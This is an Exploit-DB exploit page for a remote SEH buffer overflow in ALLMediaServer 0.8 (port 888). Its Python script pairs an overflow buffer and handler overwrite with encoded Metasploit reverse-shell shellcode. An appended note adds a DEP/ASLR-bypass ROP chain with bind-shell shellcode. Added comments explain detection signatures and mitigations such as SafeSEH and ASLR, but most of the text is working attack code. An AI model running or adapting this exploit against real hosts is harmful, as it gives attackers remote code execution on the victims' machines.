ALLMediaServer 0.8 – Remote Overflow (SEH)

  • 作者: motaz reda
    日期: 2012-07-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/19625/
  • # Exploit Title: seh exploit, BOF 
    # Date: 04/07/2012
    # Exploit Author: motaz reda 
    # my E-mail:motazkhodair@gmail.com
    # Software Link: http://allmediaserver.org/
    # Version: ALLMediaServer 0.8
    # Tested On: Windows 7 ultimate
    ################################################
    
    #!/usr/bin/python
    
    import sys, socket
    
    # One TCP client socket; the target host is taken verbatim from argv[1] and
    # the service port (888) is hard-coded in the connect below.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    s.connect((sys.argv[1], 888))
    
    # Filler up to the SEH record: per the author's layout, 1072 bytes of 'A'
    # precede the nSEH/SEH pair that overwrites the exception registration.
    # Detection note: a single-byte run of ~1 KB as the very first write to
    # port 888 is a simple, high-confidence network signature for this traffic.
    buffer = "A" * 1072
    
    # nSEH: "jmp short +6" (\xeb\x06) padded with two NOPs; it skips over the
    # 4-byte handler address that follows once the handler returns here.
    buffer += "\xeb\x06\x90\x90" #NSEHjmp short 6
    
    # SEH handler: a fixed absolute POP/POP/RETN address (author's comment).
    # Mitigation note: a hard-coded handler address only works when the module
    # it lives in lacks SafeSEH and is not ASLR-randomized; building with
    # /SAFESEH and /DYNAMICBASE (and SEHOP at the OS level) invalidates it.
    buffer += "\xca\x24\xec\x65" # SEHPOP POP RETN
    
    # msfpayload windows/shell_reverse_tcp 
    # you can replace the shellcode with any shellcode u want
    # (Encoded Metasploit payload as shipped by the author; the bytes are
    # opaque here and are not documented further.)
    
    buffer += ("\xd9\xc8\xd9\x74\x24\xf4\xb8\xa6\xaa\xb6\xad\x5b\x2b\xc9\xb1"
    "\x4f\x83\xeb\xfc\x31\x43\x15\x03\x43\x15\x44\x5f\x4a\x45\x01"
    "\xa0\xb3\x96\x71\x28\x56\xa7\xa3\x4e\x12\x9a\x73\x04\x76\x17"
    "\xf8\x48\x63\xac\x8c\x44\x84\x05\x3a\xb3\xab\x96\x8b\x7b\x67"
    "\x54\x8a\x07\x7a\x89\x6c\x39\xb5\xdc\x6d\x7e\xa8\x2f\x3f\xd7"
    "\xa6\x82\xaf\x5c\xfa\x1e\xce\xb2\x70\x1e\xa8\xb7\x47\xeb\x02"
    "\xb9\x97\x44\x19\xf1\x0f\xee\x45\x22\x31\x23\x96\x1e\x78\x48"
    "\x6c\xd4\x7b\x98\xbd\x15\x4a\xe4\x11\x28\x62\xe9\x68\x6c\x45"
    "\x12\x1f\x86\xb5\xaf\x27\x5d\xc7\x6b\xa2\x40\x6f\xff\x14\xa1"
    "\x91\x2c\xc2\x22\x9d\x99\x81\x6d\x82\x1c\x46\x06\xbe\x95\x69"
    "\xc9\x36\xed\x4d\xcd\x13\xb5\xec\x54\xfe\x18\x11\x86\xa6\xc5"
    "\xb7\xcc\x45\x11\xc1\x8e\x01\xd6\xff\x30\xd2\x70\x88\x43\xe0"
    "\xdf\x22\xcc\x48\x97\xec\x0b\xae\x82\x48\x83\x51\x2d\xa8\x8d"
    "\x95\x79\xf8\xa5\x3c\x02\x93\x35\xc0\xd7\x33\x66\x6e\x88\xf3"
    "\xd6\xce\x78\x9b\x3c\xc1\xa7\xbb\x3e\x0b\xde\xfc\xa9\x74\x49"
    "\x03\x3e\x1d\x88\x03\x2f\x81\x05\xe5\x25\x29\x40\xbe\xd1\xd0"
    "\xc9\x34\x43\x1c\xc4\xdc\xe0\x8f\x83\x1c\x6e\xac\x1b\x4b\x27"
    "\x02\x52\x19\xd5\x3d\xcc\x3f\x24\xdb\x37\xfb\xf3\x18\xb9\x02"
    "\x71\x24\x9d\x14\x4f\xa5\x99\x40\x1f\xf0\x77\x3e\xd9\xaa\x39"
    "\xe8\xb3\x01\x90\x7c\x45\x6a\x23\xfa\x4a\xa7\xd5\xe2\xfb\x1e"
    "\xa0\x1d\x33\xf7\x24\x66\x29\x67\xca\xbd\xe9\x97\x81\x9f\x58"
    "\x30\x4c\x4a\xd9\x5d\x6f\xa1\x1e\x58\xec\x43\xdf\x9f\xec\x26"
    "\xda\xe4\xaa\xdb\x96\x75\x5f\xdb\x05\x75\x4a")
    
    # The whole buffer goes out in one write immediately after connect; no
    # response is read, so from the server side this is a fire-and-forget
    # oversized first message -- the behaviour an input-length check on the
    # service's receive path (or a network-level size rule) would catch.
    s.send(buffer)
    
    s.close()
    
    ### Exploit-DB note:
    ### This affects AllMediaServer 0.94 as well.
    
    # Exploit-DB Note:
    # Here's a ROP chain that will work on Windows 7 Pro Eng DEP AlwaysOn
    # DEP/ASLR bypass with bind shell on port 4444
    buffer = "\x41" * 984
    buffer+= "\xe6\x30\x46\x00"	# Second ADD esp for stack adjustment
    				# add esp,90 | pop esi | pop ebx | retn ~ MediaServer.exe
    buffer+= "\x41" * 88
    # Step over SEH
    stackAdjust = "\x9e\x6c\x42\x00"	# add esp,800 | pop ebx | retn ~ MediaServer.exe
    					# Returns to Second ADD ESP
    stackAdjust+= "\x42\x42\x42\x42" * 15	# Padding
    
    # VirtualProtect into ESI
    rop = "\x26\xfa\xf6\x65"	# pop eax | retn	 		~ avcodec-53.dll
    rop+= "\xe0\xe4\x1e\x67"	# &kernel32.VirtualProtect		~
    rop+= "\x54\xcd\xc6\x6a"	# mov eax,dword ptr ds:[eax] | retn	~
    rop+= "\x04\xef\x2e\x66"	# xchg eax,esi | retn			~ avcodec-53.dll
    				# Puts Kernel31.VirtualProtect
    # lpAddress param into EBP
    rop+= "\xb3\x14\xb8\x68"# pop ebp | retn 	~
    rop+= "\x07\x5d\x0c\x66"	# ROP jmp esp | ???			~ avcodec-53.dll
    
    # dwSize into EBX
    rop+= "\x26\xfa\xf6\x65"# pop eax | retn~ avcodec-53.dll
    rop+= "\xff\xfd\xff\xff"	# Will negate to 0x201
    rop+= "\xbe\x13\x6e\x66"# neg eax | retn
    rop+= "\x2b\xe2\xf4\x65"	# xchg eax,ebx | retn			~ avcodec-53.dll
    
    # flNewProtect 0x40 into EDX
    rop+= "\x26\xfa\xf6\x65"# pop eax | retn 	~ avcodec-53.dll
    rop+= "\xc0\xff\xff\xff"	# Will negate to 0x40
    rop+= "\xbe\x13\x6e\x66"# neg eax | retn~ avcodec-53.dll
    rop+= "\x46\x08\x53\x66"	# xchg eax,edx | retn			~ avcoded-53.dll
    
    # lpflOldProtect into ECX
    rop+= "\x26\xfa\xf6\x65"# pop eax | retn 	~ avcodec-53.dll
    rop+= "\x69\xef\x5f\x00"	# writeable address			~ avformat-53.dll
    rop+= "\xeb\x9b\x74\x66"	# xchg eax,ecx | retn			~ avcodec-53.dll
    
    # RETN into EDI
    rop+= "\x84\xe6\x75\x66"	# pop edi | retn
    rop+= "\x6d\x9b\xb2\x6a"	# retn ROP
    
    # Nops in EAX
    rop+= "\x26\xfa\xf6\x65"# pop eax | retn 	~ avcodec-53.dll
    rop+= "\x90\x90\x90\x90"
    
    # PushAD
    rop+= "\x3a\x18\x75\x66"	# pushad | rent				~ avodec-53.dll
    
    rop+= "\x90\x90\x90\x90"
    
    
    shellcode =(
    "\xba\x4b\xdb\xfb\xca\xdb\xc2\xd9\x74\x24\xf4\x5d\x2b\xc9"
    "\xb1\x56\x31\x55\x13\x03\x55\x13\x83\xed\xb7\x39\x0e\x36"
    "\xaf\x37\xf1\xc7\x2f\x28\x7b\x22\x1e\x7a\x1f\x26\x32\x4a"
    "\x6b\x6a\xbe\x21\x39\x9f\x35\x47\x96\x90\xfe\xe2\xc0\x9f"
    "\xff\xc2\xcc\x4c\xc3\x45\xb1\x8e\x17\xa6\x88\x40\x6a\xa7"
    "\xcd\xbd\x84\xf5\x86\xca\x36\xea\xa3\x8f\x8a\x0b\x64\x84"
    "\xb2\x73\x01\x5b\x46\xce\x08\x8c\xf6\x45\x42\x34\x7d\x01"
    "\x73\x45\x52\x51\x4f\x0c\xdf\xa2\x3b\x8f\x09\xfb\xc4\xa1"
    "\x75\x50\xfb\x0d\x78\xa8\x3b\xa9\x62\xdf\x37\xc9\x1f\xd8"
    "\x83\xb3\xfb\x6d\x16\x13\x88\xd6\xf2\xa5\x5d\x80\x71\xa9"
    "\x2a\xc6\xde\xae\xad\x0b\x55\xca\x26\xaa\xba\x5a\x7c\x89"
    "\x1e\x06\x27\xb0\x07\xe2\x86\xcd\x58\x4a\x77\x68\x12\x79"
    "\x6c\x0a\x79\x16\x41\x21\x82\xe6\xcd\x32\xf1\xd4\x52\xe9"
    "\x9d\x54\x1b\x37\x59\x9a\x36\x8f\xf5\x65\xb8\xf0\xdc\xa1"
    "\xec\xa0\x76\x03\x8c\x2a\x87\xac\x59\xfc\xd7\x02\x31\xbd"
    "\x87\xe2\xe1\x55\xc2\xec\xde\x46\xed\x26\x69\x41\x23\x12"
    "\x3a\x26\x46\xa4\xad\xea\xcf\x42\xa7\x02\x86\xdd\x5f\xe1"
    "\xfd\xd5\xf8\x1a\xd4\x49\x51\x8d\x60\x84\x65\xb2\x70\x82"
    "\xc6\x1f\xd8\x45\x9c\x73\xdd\x74\xa3\x59\x75\xfe\x9c\x0a"
    "\x0f\x6e\x6f\xaa\x10\xbb\x07\x4f\x82\x20\xd7\x06\xbf\xfe"
    "\x80\x4f\x71\xf7\x44\x62\x28\xa1\x7a\x7f\xac\x8a\x3e\xa4"
    "\x0d\x14\xbf\x29\x29\x32\xaf\xf7\xb2\x7e\x9b\xa7\xe4\x28"
    "\x75\x0e\x5f\x9b\x2f\xd8\x0c\x75\xa7\x9d\x7e\x46\xb1\xa1"
    "\xaa\x30\x5d\x13\x03\x05\x62\x9c\xc3\x81\x1b\xc0\x73\x6d"
    "\xf6\x40\x83\x24\x5a\xe0\x0c\xe1\x0f\xb0\x50\x12\xfa\xf7"
    "\x6c\x91\x0e\x88\x8a\x89\x7b\x8d\xd7\x0d\x90\xff\x48\xf8"
    "\x96\xac\x69\x29")
    
    payload = buffer + stackAdjust + rop + shellcode
    rest = 1765 - len(payload)
    exploit = payload + "\xCC" * rest
    # Send exploit to target's port 888